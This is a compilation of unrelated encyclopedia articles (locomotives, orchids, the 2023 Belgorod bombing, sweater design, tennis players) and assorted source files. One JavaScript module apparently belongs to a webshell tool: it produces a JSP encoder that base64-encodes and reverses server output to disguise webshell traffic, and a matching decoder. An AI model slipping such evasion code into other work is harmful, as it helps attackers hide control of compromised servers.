func FillLeft(s string, w int) string {
return DefaultCondition.FillLeft(s, w)
}
// FillRight return string filled in left by spaces in w cells
func FillRight(s string, w int) string {
return DefaultCondition.FillRight(s, w)
}
```
|
The class WDS-3 was a diesel-electric locomotive used by Indian Railways for shunting and doing departmental works. The model name stands for broad gauge (W), Diesel (D), Shunting (S) 3rd generation (3). The WDS-3 is used mostly in the Northern Railway Zone (NR). All these locomotives were withdrawn by the late 1990s.
History
The history of WDS-3 class starts in the early 1960s with the aim of the Indian Railways to address the growing requirement for a shunting locomotive. These locomotives was designed by MaK to specification set by RDSO. Many aspects of this locomotive were taken from the DB Class V 60.
They use Suri transmission developed for these diesel locomotives and were designed as shunting-cum-shuttle service locomotives. For this purpose, the reversing gear box attached to the Suri transmission was designed to have two gear stages; in the lower gear, designated as "shunting gear", the locomotive was designated to have a maximum speed of 27 km/h and in the higher speed gear designated as "Mainline gear", the maximum locomotive speed was 65 km/h. The locomotive was fit for both shunting and mainline type of services up to a limited speed of 65 km/h.
Subsequently, it was decided to manufacture locomotives of similar type ingeniously by CLW. These locomotive are designated as WDS4/WDS4B class.
When the lot of 7 WDS3 shunters came, initially they had a lot of troubles with these locomotives, but the trouble was confined more to the power pack than to the transmission. But in course of time, going into detail about the troubles that were being experienced and the mechanics were able to get over a lot of these difficulties and in-fact the transmission was also modified to suit with the engine. By 1979 out of 7 locomotives, five are still after 15 years of service working and did not have trouble. But by 1990s all units were withdrawn from service.
Former shed
Shakurbasti (SSB): All the locomotives of this class has been withdrawn from service.
See also
Locomotives of India
Rail transport in India
Indian locomotive class WDM-2
References
Notes
Bibliography
C locomotives
Railway locomotives introduced in 1976
5 ft 6 in gauge locomotives
Diesel-hydraulic locomotives of India
MaK locomotives
Shunting locomotives
|
Dendrobium × usitae, or Usita's dendrobium, is a species of epiphytic orchid endemic to the Philippines. It is a natural hybrid between D. bullenianum and D. goldschmidtianum and can be easily distinguished from both species by its purplish orange flower. The specific epithet honors Villamor T. Usita of Quezon City, who discovered the species from Calayan, one of the five major islands of Babuyan archipelago. In its native habitat, the plant grows hanging on trees at an elevation of 500 to 700 meters above sea level alongside its parent species. The pendulous stem of D. × usitae can reach a length of 60 centimeters.
References
External links
usitae
Endemic orchids of the Philippines
Flora of Luzon
Interspecific orchid hybrids
Plants described in 1995
|
On the evening of 20 April 2023, a Russian Su-34 strike fighter accidentally dropped a bomb on the Russian city of Belgorod near the border with Ukraine. The Russian authorities acknowledged the fact of the bombing, declaring the destruction in the city and the injury of three people.
Background
Bordering Ukraine, the Belgorod Oblast and its administrative center Belgorod have been subject to several shellings since the beginning of the Russian invasion of Ukraine in February 2022. Russian military jets regularly fly over Belgorod on their way to Ukraine.
The authorities of the Russian regions bordering Ukraine – Belgorod, Bryansk and Kursk Oblasts – regularly report shelling, as a result of which there is destruction and casualties. Regional authorities claim that the attacks are carried out from the Ukrainian side. The Ukrainian authorities have not responded to these claims.
Incident
A video from a surveillance camera has appeared on Russian Telegram channels, which allegedly shows the moment of the explosion in Belgorod. In black and white footage, a whistle-like sound is heard first, followed by silence. The bomb landed at an intersection of two roads not far from the city centre and next to residential buildings. A few seconds later there is a loud explosion. According to assumptions, the explosive device was first buried in the ground and only then exploded.
According to Ministry of Defence, "At around 22:15 Moscow time on 20 April, when a Su-34 plane of the Russian Aerospace Forces was performing a flight above the city of Belgorod, an emergency release of an air ordnance occurred". The MoD statement did not say what kind of bomb fell on the city.
The Governor of the Belgorod Oblast Vyacheslav Gladkov said earlier in Telegram that an explosion occurred in the city center, a crater with a diameter of 20 meters formed, several cars and buildings were damaged.
Damage and injuries
The bomb explosion created a large crater with a diameter of 40 meters (130 feet). Photos and videos posted online show piles of concrete on the street, several damaged cars and buildings. One image shows a car on top of a Pyaterochka supermarket.
The next day, Vyacheslav Gladkov reported three people wounded in the explosion of a dropped bomb, though their injuries were not life-threatening. Gladkov said "Thank God, there are no dead" in a Telegram statement, adding that the apartment building was evacuated at night.
Belgorod Mayor Valentin Demidov said several apartments were damaged in the explosion, and their residents temporarily placed in hotels.
Afterwards, another explosive was found in the same neighbourhood, prompting the evacuation of 3,000 residents from 17 apartment buildings until it was removed and detonated.
See also
"To bomb Voronezh" – Russian internet slang referring to Russian government responses to foreign sanctions that harm the citizens of Russia itself.
List of friendly fire incidents
2022 Yeysk military aircraft crash
References
2023 disasters in Russia
April 2023 events in Russia
Aviation accidents and incidents in Russia in 2023
Airstrikes during the Russian invasion of Ukraine
Spillover of the Russian invasion of Ukraine
Friendly fire incidents
Russian Aerospace Forces
2023 bombing
Aviation accidents and incidents in Russia
|
Gmina Zarzecze is a rural gmina (administrative district) in Przeworsk County, Subcarpathian Voivodeship, in south-eastern Poland. Its seat is the village of Zarzecze, which lies approximately south of Przeworsk and east of the regional capital Rzeszów.
The gmina covers an area of , and as of 2006 its total population is 7,174 (7,183 in 2011).
Villages
Gmina Zarzecze contains the villages and settlements of Kisielów, Łapajówka, Maćkówka, Parcelacja Rożniatowska, Pełnatycze, Rożniatów, Siennów, Zalesie Żurowskie, Zarzecze and Żurawiczki.
Neighbouring gminas
Gmina Zarzecze is bordered by the town of Przeworsk and by the gminas of Kańczuga, Pawłosiów, Pruchnik, Przeworsk and Roźwienica.
References
Polish official population figures 2006
Zarzecze
Przeworsk County
|
Sweater design is a specialization of fashion design in which knitted sweaters are designed to fulfill certain aesthetic, functional and commercial criteria. The designer typically considers factors such as the insulating power of the sweater (and its resulting warmth for the wearer); the fashion of its colors, patterns, silhouette and style lines, particularly the neckline and waistline; the convenience and practicality of its cut; and in commercial design, the cost of its production and the profitability of its price point. Sweater designs are often published in books and knitting magazines. Sweater design is an old art, but continues to attract new designers such as Nicky Epstein and Meg Swansen.
Criteria
The aim of sweater design is a sweater that fulfils certain criteria. The primary criterion is that its intended wearer wants to wear it and, in case of commercial sweater design, is willing to buy it at a commercially feasible price point. General secondary criteria include
the insulating power, material and breathability of the sweater should make its intended wearer physically comfortable;
the sweater should be appropriate for the occasion in which it will be worn;
makes its intended wearer feel fashionably attractive;
To satisfy these secondary criteria, the designer has several tools at their disposal, such as yarns, colors, patterns, textures, necklines, hemlines, sleeve shapes, style lines, pockets and embellishments, as well as the fit of the garment to its intended wearer, the silhouette.
For commercial sweater design, the production of the sweater must also be inexpensive, lest the price point be too high and make the sweater undesirable. This is generally done by simplifying the design so that it can be made by machine; more complicated commercial designs are generally hand-knit in pieces that are then stitched together. For example, the separate pieces of the hand-knit sweaters found in stores are generally knit and assembled in different villages in China.
Despite the wealth of design techniques and studies of successful designs, the primary criterion (that the sweater be desired) is not always achieved, often due to factors beyond the designer's control including serendipity.
Functional role as criterion
Sweaters are worn in various circumstances. For example, while some sweaters are worn at fancy dress occasions, others are worn to work, to religious services, in sporting or outdoors events such as hiking and camping. Similarly, the choice of a sweater can vary with different climates and different seasons, even with different times of the day. The sweater designer will generally target a particular occasion and temperature, e.g., a bulky, cabled, long-sleeved woolen seater for camping versus a refined, elegantly simple, short-sleeved cashmere sweater for white-collar work.
Comfort criterion
Comfort is paramount; the sweater should make the wearer feel at ease, in the most general sense. The temperature should be right, the fabric should "breathe" and should not irritate the skin. The sweater should hang right and not need constant adjustment; It should fit well and allow for customary motion without binding (e.g., at the armholes). Finally, a sweater should not make the wearer feel uncomfortable because of its "cut" (e.g. showing bra straps or too much cleavage) or general style (e.g., colors/patterns that the wearer feels are inappropriate).
Fitting a sweater
The fit of a sweater affects its comfort, its attractiveness and, sometimes, its practicality (e.g., dangling sleeves can fall into food or get caught on hooks).
The simplest sweaters (drop sleeve, cylindrical) require six measurements:
circumference around the bust/chest (widest point)
circumference (or width) of the neck
under-arm length (armhole to sleeve-cuff hem)
circumference of the arm at the sleeve-cuff hem
back length (vertical distance from back of the neck to lower hem)
armhole depth (vertical distance from bottom of armhole to lower hem)
A few more measurements usually produce a well-fitted sweater:
circumference at the lower hem
over-arm length (shoulder to sleeve-cuff hem)
circumference of the upper arm near the armhole
bust height (vertical distance from back of the neck to bust line)
shoulder width (horizontal distance between bony shoulder points, measured across back)
For a more tailored look, even more measurements are necessary
slope of the shoulders (vertical distance from base of neck to shoulder-point line)
neck-shoulder length (horizontal distance from base of neck to shoulder point)
circumference at the waist, the point of largest inward or outward curvature
waist height (vertical distance from back of the neck to waist line)
Ideally, these measurements will be taken directly from the intended wearer, since bodies are idiosyncratic and these measurements may vary independently of one another, e.g., the bust measurement does not determine the waist or hip measurements, just as the height does not determine the arm length or shoulder width. Alternatively, the body measurements may be estimated from clothing that fits the wearer well. As a last resort, standard measurements such as EN 13402 or US standard clothing sizes may be used.
Of course, a sweater need not conform exactly to the wearer's body. Ease may be introduced to make the sweater larger than the body (oversized), typically by increasing the circumference measurements by 2-6 inches. Different amounts of ease can be introduced at different points to give the sweater a distinctive silhouette. For example, a "Gibson-girl" sleeve is produced by adding much ease to the upper arm and none to the lower arm, whereas the reverse is true for "bell" sleeves (also called "bishop" sleeves). Similarly, the bodice can fit loosely in the bust and tightly at the waist, or the reverse. Negative ease (i.e., subtracting from the body measurements) is also possible to achieve a very close-fitting look, but more than 2 inches is not recommended.
By making the sweater match the desired measurements, an excellently fitting sweater can be made. The width of a knitted piece at a given height should equal the corresponding circumference; for example, if the desired bust circumference is 38", then the front or back width at that height should be 19" each. The width of the upper sleeve (just before the sleeve cap, if any) should likewise equal the desired circumference of the upper arm.
Having determined the size and shapes of the knitted pieces, the number of stitches in a row is given by the desired width multiplied by the knitting gauge (e.g., 5 st/inch). Similarly, the number of rows in a column may be determined by multiplying the desired height by the vertical gauge (e.g., 3 rows/inch).
Shaping
The human body has curvature, but woven fabric is flat and has little elasticity. To produce curvature in a smooth (unruffled) woven fabric, it is necessary to subtract or add wedges of fabric. Positive curvature (cupping, such as is needed at the bust point or over the rear) is produced by subtracting a wedge (a dart) with the point of the dart almost at the point of desired maximum curvature. The greater the angle of the wedge, the greater the local curvature. (The orientation of the dart is unimportant for the curvature, so it can be chosen to accentuate a style line of the garment.) Similarly, negative curvature (ruffling/saddle-shaping, as at a skirt hem, lower back or under the bust) is produced by adding a wedge (a flare). Although the base of individual wedges usually lies on a seam, sometimes wedges occur in pairs (diamonds) that are independent of the seams. Subtracting a diamond-shaped dart produces positive curvature at the outer points of the diamond, and negative curvature at the middle points that are brought together (good for the bust or back). Conversely, adding a diamond-shaped gusset produces negative curvature at its tips and positive curvature at its middle (useful in designing stuffed animals). Sometimes, the sharp, angular edges of the wedges are softened to form continuous princess seams.
Since knitted fabric is generally elastic, it conforms readily to the wearer's body without shaping. However, some shaping may be necessary when the knitted fabrics are unusually stiff (e.g., thick cable designs or heavily overstitched designs) or in regions of high curvature (e.g. sock heels). Ironically, shaping is much easier and less obvious with knitted fabrics than with woven cloth. Instead of cutting out wedges and sewing the edges together, knitters can add or subtract stitches; work short rows; or, most subtly of all, change the needle size to produce smaller/larger stitches in the desired "wedge" region.
Choosing the yarn
The choice of yarn affects the comfort of the sweater, since it affects its warmth, weight and ability to "breathe" (air exchange). Some yarns will also produce itching or even allergic reactions in some wearers.
The yarn affects the bulk and drape of the knitted fabric, as well as the visibility of stitches. Complicated stitch patterns are best seen with a smooth, highly spun yarn and may be invisible with "furry" yarns such as mohair or novelty yarns.
The washability of yarn affects its practicability. Thus, sweaters knitted for young children are usually knitted in acrylics, which are light in weight and washable.
The yarn will also determine the lifetime of the sweater (in general, highly spun yarns suffer less wear with time) and
how well it will retain its shape (elastic yarns like wool are better than non-elastic yarns like cotton or silk).
Choosing colors
The choice of colors is critical to the design of a sweater.
The simplest choice is to use multiple shades of a single color (e.g.,
various shades of blue), perhaps accented with a contrasting color (e.g. flecks of yellow). The arrangement of shades on the sweater can have
a significant visual effect, due to the principle of chiaroscuro; dark shades tend to recede and be smaller, whereas light shades advance and seem larger. For example, vertical stripes with a light color in the middle and dark colors on the sides have a slimming effect. Psychologically, bright colors tend to be associated with straightforward, innocent or extroverted personalities, whereas darker shades are associated with more thoughtful, experienced and introverted personalities.
The "temperature" of a color also affects its perceived depth. Warm colors have red or yellow tones (including orange and yellow-green) and are associated psychologically with warmth and energy. Cool colors have more bluish undertones (including purples, aquas and greens) and are associated psychologically with serene, calm personalities. Warm colors tend to advance relative to cool colors, when both are presented simultaneously.
Contrasting colors may be chosen in various ways. A common choice is to take a complementary colors from one of the several color wheels (e.g., blue and orange, green and red), or to choose a pairing that occurs in nature, e.g., yellow and red.
Choosing shapes
The designer has many choices for how to shape the sleeve length and cap, waistline/hemline and neckline/collar; these various choices and their visual effects are described in their individual entries. The overall shape (silhouette) of the garment is defined by the ease introduced at various points, as described above under "Fitting". In addition, a sweater may have ornamental lines/curves, even images. In general, these lines are chosen to achieve a balanced look; for example, well-chosen style lines can help compensate for body lines considered too long or too angular or too short or too rounded. However, visual effects may be idiosyncratic, and the knitter is encouraged to experiment.
Choosing an overall pattern
The scale of the overall pattern relative to the size of the whole sweater is a key variable in the "look" of the sweater. Large overall patterns eliminate the need for accent patterns (see next section) but may be too bold for some wearers. A small, fine pattern makes an excellent background for accent patterns, but may not be visible with a particular yarn, or may be too retiring for some wearers.
Choosing accent patterns
A sweater done uniformly in the same pattern overall is relatively simple and understated, which may be the desired effect. However, it is more usual to decorate the sleeve cuffs and either the neckline or the lower hemline with an accent pattern. The accent band can be rather wide (often ~1/3 of the total length) and its boundary can be straight or wavy/serrated.
Smaller boundaries (such as collars, tops of pockets, central seam in cardigan) may receive special ornamentation as well, e.g., cabling along its edges.
Embellishments
There are many types of ornamental embellishments that can modify the overall look of the sweater.
Collars and lapels are perhaps the most visually obvious embellishments. They frame the face, neck and shoulders, and complement the neckline and armhole lines.
The choice of closures is an important practical consideration and can also help define the sweater's style. Buttons and zippers are the most common choices for sweaters, but frogs, ties and belts are also seen.
Shoulder pads and other shaping devices are uncommon, but can be included
to define a particular silhouette.
The fabric of the sweater can be ornamented with various textures, such as gathers, ruffles, pleats, ruching and shirring. Ornamental patterns can be
added using beads, buttons, sequins, bobbles, ribbons and knots, as well as appliqué or cordwork. Overstitching (also known as Swiss darning) and other
embroidery techniques allow for many visual effects that cannot be made with normal knitting, e.g., a circle of successively interlocking stitches.
See also
Sweater
References
Newton D. (1998) Designing Knitwear, Taunton Press.
Righetti M. (1990) Sweater Design in Plain English, St. Martin's Griffin.
Budd A. (2004) The Knitter's Handy Book of Sweater Patterns : Basic Designs in Multiple Sizes & Gauges, Interweave Press.
Epstein N. (1999) Nicky Epstein's Knitted Embellishments: 350 Appliques, Borders, Cords and More!, Interweave Press.
(2002) Vogue Knitting: The Ultimate Knitting Book, 2nd. ed., Sixth and Spring Books.
Zimmerman E (1973) Knitting Without Tears : Basic Techniques and Easy-to-Follow Directions for Garments to Fit All Sizes, Fireside Press.
June Hemmons Hiatt (1988) The Principles of Knitting, Simon and Schuster, pp. 433–448.
Knitting
Design
|
```objective-c
* Use of this file is governed by the BSD 3-clause license that
* can be found in the LICENSE.txt file in the project root.
*/
#pragma once
#include "atn/ATNConfig.h"
#include "atn/ATNConfigSet.h"
namespace antlr4 {
namespace atn {
class ANTLR4CPP_PUBLIC OrderedATNConfigSet : public ATNConfigSet {
protected:
virtual size_t getHash(ATNConfig* c) override;
};
} // namespace atn
} // namespace antlr4
```
|
LaBarque Creek Conservation Area (LCCA) consists of in northwestern Jefferson County, Missouri. It is south of Pacific and southwest of Eureka. The LCCA is part of the Henry Shaw Ozark Corridor. The Young Conservation Area is about to the east, Myron and Sonya Glassberg Family Conservation Area is to the northeast, Pacific Palisades Conservation Area is to the north, Catawissa Conservation Area is northwest, and Robertsville State Park is west.
In 2005 the Missouri Department of Conservation purchased from The Nature Conservancy and a private landowner. Other acquisitions brought the total acreage to , and it opened to public use on November 15, 2007. In December 2010, these became a part of the Missouri Natural Areas System as LaBarque Creek Natural Area. Three adjacent parcels of land totaling a combined were added to LCCA, bringing its total area to and connected it to land that will become Don Robinson State Park to the south, forming a block of public protected land. None of the more recently acquired land is part of the designated natural area.
The LCCA has a loop trail on its eastern side open to hiking only. The LCCA is open to archery deer hunting only.
The LaBarque watershed has a great variety of terrestrial natural communities, including small sandstone glades, forested fens and many kinds of woodland. There are at least 42 fish species in LaBarque Creek.
References
External links
Friends of LaBarque Creek Watershed
Protected areas of Jefferson County, Missouri
Protected areas established in 2005
Conservation Areas of Missouri
|
Palma Kiraly (born 2 February 1991) is a former professional tennis player from the Hungary. On 3 March 2009, she reached her highest WTA singles ranking of 399.
Tennis career
She has won 2 singles titles on the ITF Women's Circuit. In 2008, Kiraly won her first singles title in Budva defeating Croatianwoman Tereza Mrdeža. Her only WTA Tour main draw appearance came at the Budapest Grand Prix, but lost to Anna-Lena Grönefeld in the first round.
References
External links
1991 births
Living people
Hungarian female tennis players
|
```javascript
/**
* jspjs::b64reverse
*/
'use strict';
module.exports = {
/**
* @returns {string} asenc
*/
asoutput: () => {
return `function asenc(str){
importPackage(Packages.sun.misc);
importPackage(Packages.java.util);
var ret = "";
try {
ret = new Base64().getEncoder().encodeToString(str.getBytes());
} catch (e) {
ret = new BASE64Encoder().encode(str.getBytes());
}
ret = ret.replaceAll("\\r|\\n", "");
return new StringBuffer(ret).reverse();
}
`.replace(/\n\s+/g, '');
},
/**
* Buffer
* @param {Buffer} buff Buffer
* @returns {Buffer} Buffer
*/
decode_buff: (buff) => {
return Buffer.from(Buffer.from(buff).reverse().toString(), 'base64');
}
}
```
|
```tex
\documentclass{article}
\usepackage[fancyhdr,pdf]{latex2man}
\input{common.tex}
\begin{document}
\begin{Name}{3}{unw\_get\_reg}{David Mosberger-Tang}{Programming Library}{unw\_get\_reg}unw\_get\_reg -- get register contents
\end{Name}
\section{Synopsis}
\File{\#include $<$libunwind.h$>$}\\
\Type{int} \Func{unw\_get\_reg}(\Type{unw\_cursor\_t~*}\Var{cp}, \Type{unw\_regnum\_t} \Var{reg}, \Type{unw\_word\_t~*}\Var{valp});\\
\section{Description}
The \Func{unw\_get\_reg}() routine reads the value of register
\Var{reg} in the stack frame identified by cursor \Var{cp} and stores
the value in the word pointed to by \Var{valp}.
The register numbering is target-dependent and described in separate
manual pages (e.g., libunwind-ia64(3) for the IA-64 target).
Furthermore, the exact set of accessible registers may depend on the
type of frame that \Var{cp} is referring to. For ordinary stack
frames, it is normally possible to access only the preserved
(``callee-saved'') registers and frame-related registers (such as the
stack-pointer). However, for signal frames (see
\Func{unw\_is\_signal\_frame}(3)), it is usually possible to access
all registers.
Note that \Func{unw\_get\_reg}() can only read the contents of
registers whose values fit in a single word. See
\Func{unw\_get\_fpreg}(3) for a way to read registers which do not fit
this constraint.
\section{Return Value}
On successful completion, \Func{unw\_get\_reg}() returns 0.
Otherwise the negative value of one of the error-codes below is
returned.
\section{Thread and Signal Safety}
\Func{unw\_get\_reg}() is thread-safe as well as safe to use
from a signal handler.
\section{Errors}
\begin{Description}
\item[\Const{UNW\_EUNSPEC}] An unspecified error occurred.
\item[\Const{UNW\_EBADREG}] An attempt was made to read a register
that is either invalid or not accessible in the current frame.
\end{Description}
In addition, \Func{unw\_get\_reg}() may return any error returned by
the \Func{access\_mem}(), \Func{access\_reg}(), and
\Func{access\_fpreg}() call-backs (see
\Func{unw\_create\_addr\_space}(3)).
\section{See Also}
\SeeAlso{libunwind(3)},
\SeeAlso{libunwind-ia64(3)},
\SeeAlso{unw\_get\_fpreg(3)},
\SeeAlso{unw\_is\_signal\_frame(3)},
\SeeAlso{unw\_set\_reg(3)}
\section{Author}
\noindent
David Mosberger-Tang\\
Email: \Email{dmosberger@gmail.com}\\
WWW: \URL{path_to_url}.
\LatexManEnd
\end{document}
```
|
```html
<!--
path_to_url
Unless required by applicable law or agreed to in writing, software
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-->
<mat-card appearance="outlined" class="page-content single-column">
<tp-loading *ngIf="loading"></tp-loading>
<form ngNativeValidate (ngSubmit)="submit($event)">
<mat-card-content class="container">
<mat-form-field>
<mat-label>Name</mat-label>
<input matInput type="text" name="name" required [(ngModel)]="topology.name">
</mat-form-field>
<mat-form-field>
<mat-label>Description</mat-label>
<textarea matInput name="description" [(ngModel)]="topology.description"></textarea>
</mat-form-field>
</mat-card-content>
<mat-card-content class="container">
<mat-tree [dataSource]="topologySource" [treeControl]="topologyControl">
<mat-nested-tree-node *matTreeNodeDef="let node; when: hasChild">
<div class="mat-tree-node" matTreeNodeToggle mat-menu-item [attr.aria-label]="'Toggle ' + node.name">
{{node.name}}
</div>
<div class="expand-node" role="group">
<ng-container matTreeNodeOutlet></ng-container>
</div>
</mat-nested-tree-node>
</mat-tree>
</mat-card-content>
<mat-card-actions align="end" class="actions-container">
<button mat-raised-button type="button" *ngIf="!new" color="warn" (click)="delete()">Delete</button>
<button mat-raised-button color="primary" type="submit">Save</button>
</mat-card-actions>
</form>
</mat-card>
```
|
```php
<?php
/*
*
*
* path_to_url
*
* Unless required by applicable law or agreed to in writing, software
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
*/
namespace Google\Service\Compute;
class InstanceParams extends \Google\Model
{
/**
* @var string[]
*/
public $resourceManagerTags;
/**
* @param string[]
*/
public function setResourceManagerTags($resourceManagerTags)
{
$this->resourceManagerTags = $resourceManagerTags;
}
/**
* @return string[]
*/
public function getResourceManagerTags()
{
return $this->resourceManagerTags;
}
}
// Adding a class alias for backwards compatibility with the previous class name.
class_alias(InstanceParams::class, 'Google_Service_Compute_InstanceParams');
```
|
Developed by Mitsubitshi Electric Research Laboratories, a privacy-enhanced computer display allows information that must remain private to be viewed on computer displays located in public areas (i.e. banks, hospitals and pharmacies) by employing the use of both ferroelectric shutter glasses and a unique device driver.
History
Prior to the invention of privacy-enhanced computer display by the Mitsubitshi Electric Research Laboratories, several static systems that serve a similar purpose were established.
Static system is a preventive tool that protects the public computer display without any dynamic alterations to the video stream itself. For instance, a security screen that prevents any users who are not on the right angle to see the display is a static system. Another example of the static system is the front polarizer of the LCD screen. Such polarizer is removed when the computer display is in "secure use". The authorized users who have access to the confidential information need to wear a polarized sunglasses to see the screen.
Technology
Privacy-enhanced computer display technology utilizes a public display image ( denoted Pij for the pixel value at location i,j in the public image), a secret display image (Sij, similarly denoted for pixel value at pixel location i,j ), a proprietary device driver, a CRT capable of rapid refresh rates (up to 120 Hz) and a set of synchronized ferroelectric shutter glasses. The device driver causes the computer monitor to alternately display the pixelwise difference (Pij – Sij) and the unaltered secret image (Sij).
When viewed directly without the shutter glasses, the human eye's persistence of vision blurs the two images into [(Pij – Sij + Sij) / 2], which reduces to (Pij / 2), which is the public image, effectively preventing an unintended recipient from viewing the secret image.
The intended recipient, wearing the synchronized glasses, will see only the (Sij) secret image.
Advantages and disadvantages
The major advantage of the shutter glass system was that it allowed the same display to be used for multiple unrelated images, one of which was visible without any glasses at all. Unfortunately, the contrast ratio of the public image is only 1/2 the available contrast ratio of the CRT when driven with only a public image.
A secondary issue was that although the image was privacy-enhanced, it was not secure. The secret image appeared as a "ghost" if one moved one's head rapidly - or struck the viewer's head with a soft object, thereby offsetting the two image fields and revealing the edges of the difference image.
With the rapid growth of handheld phones with integrated digital cameras (and fast shutters) the phone's camera video will often reveal alternating frames of the public and secret images. This effectively breaks the privacy capability of the system.
A final issue is the decline of the CRT and the rise of the LCD in display technology, because nearly all LCDs are too slow to support the 120 Hz or faster refresh rate needed for this privacy enhancement to work. Meanwhile, lenticular monitor filters have diminished the need for the shutterglass technology.
Possible applications
Banks (bank balance information)
Hospitals (patient health information)
Pharmacies (prescription drug information)
Airline ticketing and airport gate agent stations (passenger and security information)
Sales
The patent was sold in 2010 to Intellectual Ventures, who obtained a reissue in 2012 (US patent RE43,362) with additional claims.
References
External links
US Patent 7,164,779
Indoor LED Display
Display devices
Mitsubishi Electric products, services and standards
|
```c++
/* regs IO test
This file is part of DeSmuME
DeSmuME is free software; you can redistribute it and/or modify
(at your option) any later version.
DeSmuME is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
along with DeSmuME; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <nds.h>
#include <stdio.h>
#include "../../regstest.h"
#define myassert(e,msg) ((e) ? (void)0 : _myassert(__FILE__, __LINE__, #e, msg))
void _myassert(const char *fileName, int lineNumber, const char* conditionString, const char* message)
{
iprintf("---\nAssertion failed!\n\x1b[39mFile: \n%s\n\nLine: %d\n\nCondition:\n%s\n\n\x1b[41m%s",fileName, lineNumber, conditionString, message);
for(;;) swiWaitForVBlank();
}
arm7comm_t arm7comm;
int main(void) {
consoleDemoInit();
//tell the arm7 where to store its stuff
//(the arm7 needs to know a location in main memory (shared) to store its results)
//(it could store its results in shared arm7 memory but we chose to do it this way since)
//(I couldn't figure out how to specify storage there for a global in arm7.cpp. any suggestions?)
fifoSendAddress(FIFO_USER_01,&arm7comm);
//fog table entries should not be readable. they should return 0
for(int i=0;i<32;i++)
{
GFX_FOG_TABLE[i] = 0xFF;
//iprintf("%02X\n",GFX_FOG_TABLE[i]);
myassert(GFX_FOG_TABLE[i] == 0x00,"test whether fog table entries are non-readable");
}
//8bit vram reads should work. 8bit vram writes should fail
vu8* bgmem8 = (vu8*)0x06000000;
vu16* bgmem16 = (vu16*)0x06000000;
vu32* bgmem32 = (vu32*)0x06000000;
bgmem16[0] = 0x1234;
bgmem16[1] = 0x5678;
myassert(bgmem8[0] == 0x34 && bgmem8[1] == 0x12 && bgmem8[2] == 0x78 && bgmem8[3] == 0x56,"test 8bit vram reads");
bgmem8[0] = 0;
myassert(bgmem8[0] == 0x34, "test 8bit vram writes");
//test OAM also
vu8* oam8 = (vu8*)0x07000000;
vu16* oam16 = (vu16*)0x07000000;
vu32* oam32 = (vu32*)0x07000000;
oam16[0] = 0x1234;
oam16[1] = 0x5678;
myassert(oam8[0] == 0x34 && oam8[1] == 0x12 && oam8[2] == 0x78 && oam8[3] == 0x56,"test 8bit oam reads");
oam8[0] = 0;
myassert(oam8[0] == 0x34, "test 8bit oam writes");
//test pal also
vu8* pal8 = (vu8*)0x05000000;
vu16* pal16 = (vu16*)0x05000000;
vu32* pal32 = (vu32*)0x05000000;
pal16[0] = 0x1234;
pal16[1] = 0x5678;
myassert(pal8[0] == 0x34 && pal8[1] == 0x12 && pal8[2] == 0x78 && pal8[3] == 0x56,"test 8bit pal reads");
pal8[0] = 0;
myassert(pal8[0] == 0x34, "test 8bit pal writes");
//-------------------
iprintf("waiting for arm7 test to finish!\n");
for(;;)
{
if(fifoCheckValue32(FIFO_USER_01))
break;
swiWaitForVBlank();
}
iprintf("firmwareID: %08X\n",arm7comm.firmwareId);
iprintf("arm7 finish code: %d\n",arm7comm.code);
if(arm7comm.code == 1)
{
iprintf("arm7 test failed!\n");
iprintf("%s\n",arm7comm.message);
iprintf("offending val: 0x%08X\n",arm7comm.offender);
}
else
{
iprintf("all tests OK");
}
for(;;) swiWaitForVBlank();
return 0;
}
```
|
```c
/**
* @license Apache-2.0
*
*
*
* path_to_url
*
* Unless required by applicable law or agreed to in writing, software
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*/
/*
* The following is auto-generated. Do not manually edit. See scripts/loops.js.
*/
#include "stdlib/strided/base/unary/i_u.h"
#include "stdlib/strided/base/unary/macros.h"
#include <stdint.h>
/**
* Applies a unary callback to strided input array elements and assigns results to elements in a strided output array.
*
* @param arrays array whose first element is a pointer to a strided input array and whose second element is a pointer to a strided output array
* @param shape array whose only element is the number of elements over which to iterate
* @param strides array containing strides (in bytes) for each strided array
* @param fcn callback
*
* @example
* #include "stdlib/strided/base/unary/i_u.h"
* #include <stdint.h>
*
* // Create underlying byte arrays:
* uint8_t x[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
* uint8_t out[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
*
* // Define a pointer to an array containing pointers to strided arrays:
* uint8_t *arrays[] = { x, out };
*
* // Define the strides:
* int64_t strides[] = { 4, 4 };
*
* // Define the number of elements over which to iterate:
* int64_t shape[] = { 3 };
*
* // Define a callback:
* static int32_t fcn( int32_t x ) {
* return x;
* }
*
* // Apply the callback:
* stdlib_strided_i_u( arrays, shape, strides, (void *)fcn );
*/
void stdlib_strided_i_u( uint8_t *arrays[], const int64_t *shape, const int64_t *strides, void *fcn ) {
typedef int32_t func_type( const int32_t x );
func_type *f = (func_type *)fcn;
STDLIB_STRIDED_UNARY_LOOP_CLBK( int32_t, uint32_t )
}
```
|
Marcel Bernard (; 18 May 1914 – 29 April 1994) was a French tennis player. He is best remembered for having won the French Championships in 1946 (reaching the semifinals a further three times). Bernard initially intended to play only in the doubles event but was persuaded to enter the singles competition as well. He defeated Jaroslav Drobný in the final in five sets.
In the same 1946 French Championships Bernard also won the Men's Doubles with Yvon Petra. In the 1935 French Open, he won the Mixed Doubles with Lolette Payot. In the following French Open (1936), he also won the Mixed Doubles with Billie Yorke and the Men's Doubles with Jean Borotra. Bernard's Grand Slam singles career spanned 25 years from 1931 to 1956. He played Davis Cup for France over a period spanning 21 years, from 1935 to 1956. Bernard was ranked world No. 5 for 1946 by A. Wallis Myers and world No. 9 for 1947 by Harry Hopman.
Bernard became president of the national French tennis association, Fédération Française de Tennis (FFT), in 1968 and held the position until 1973. The trophy for the winners of the mixed doubles competition at the French Open is now known as the "Coupe Marcel Bernard". His name is also commemorated at the Roland-Garros Stadium by the walkway "Allée Marcel Bernard" which leads to the Suzanne Lenglen Court.
Grand Slam finals
Singles : 1 title
Doubles : 2 titles, 1 runner-up
Mixed doubles : 2 titles
References
External links
1914 births
1994 deaths
French Championships (tennis) champions
French male tennis players
People from La Madeleine, Nord
